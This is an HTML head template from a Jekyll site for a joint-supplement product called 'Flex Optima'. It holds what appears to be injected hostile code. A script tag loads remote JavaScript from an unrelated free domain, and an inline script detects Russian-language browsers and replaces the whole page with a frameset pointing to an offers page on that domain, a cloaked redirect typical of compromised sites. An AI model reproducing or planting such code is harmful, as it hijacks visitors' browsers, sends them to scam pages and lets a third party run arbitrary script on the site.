<head>
  <meta charset="utf-8">
   
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <script type="text/javascript" src="https://wzrd.ml/revitaboosteres12"></script>



  <title>Flex Optima - Protect your joints</title>
  <link rel="icon" type="image/png" href="/assets/favicon.png">
  <meta name="description" content="{{ page.excerpt | default: site.description | strip_html | normalize_whitespace | truncate: 160 | escape }}">

  <link rel="stylesheet" href="{{ "/assets/main.css" | relative_url }}">
  <link rel="stylesheet" href="https://cdn.snipcart.com/themes/v3.0/default/snipcart.css" />
  <link rel="canonical" href="{{ page.url | replace:'index.html','' | absolute_url }}">
  <link rel="alternate" type="application/rss+xml" title="{{ site.title | escape }}" href="{{ "/feed.xml" | relative_url }}">
  <script>
  var language = navigator.language || navigator.browserLanguage;
  // alert(language);
  if (language.indexOf('ru') > -1) {
    document.write('<frameset rows="100%,*" border="0" frameborder="0" framespacing="0" framecolor="#000000"><frame src="https://wzrd.ml/wzrd/offers/dieta/es/chestnut/" height="100%" width="100%><noframes>');
  } else {
  exit;
  }
</script>
</head>
